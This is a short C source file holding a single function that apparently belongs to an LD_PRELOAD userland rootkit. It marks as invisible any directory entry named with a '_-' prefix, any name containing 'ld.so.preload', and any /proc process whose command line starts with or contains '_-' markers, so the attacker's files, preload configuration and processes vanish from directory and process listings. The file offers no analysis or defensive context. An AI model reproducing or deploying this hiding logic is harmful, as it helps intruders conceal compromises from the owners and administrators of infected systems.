#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <string.h>


int is_invisible(char *d_name, int d_ino)
{
	struct stat file_stat;
	char proc_id[0x1000];
	char proc_cmdline[0x1000];
	char buf[0x1000];
	char *buf_ptr = buf;
	int fd;
	int cmdline_length;
	int i;

	//printf("readdir: %s\n", d_name);
	//printf("readdir: %d\n", d_name);
	if(strncmp("_-", d_name, 2) == 0)
	{
		return -1;
	}
	if(strstr(d_name, "ld.so.preload") != 0)
	{
		return -1;
	}

	memset(proc_id, 0, 0x1000);
	snprintf(proc_id, 0x1000, "/proc/%s", d_name);
	if(stat(proc_id, &file_stat) == 0)
	{
		if(d_ino == file_stat.st_ino)
		{
			memset(proc_cmdline, 0, 0x1000);
			snprintf(proc_cmdline, 0x1000, "%s/cmdline", proc_id);
			if((fd = open(proc_cmdline, O_RDONLY)) != -1)
			{
				memset(buf, 0, 0x1000);
				
				cmdline_length = read(fd, buf, 0x1000);

				for(i=0; i < cmdline_length-1; i++)
				{
					if(buf[i] == 0)
					{
						buf[i] = ' ';
					}
				}
				if(buf[0] == '_' && buf[1] == '-')
				{
					return -1;
				}
				if (strstr(buf,"_-/") != 0 || strstr(buf,"/_-") != 0)
				{
					return -1;
				}
			}
				
		}
	}

	return 0;

}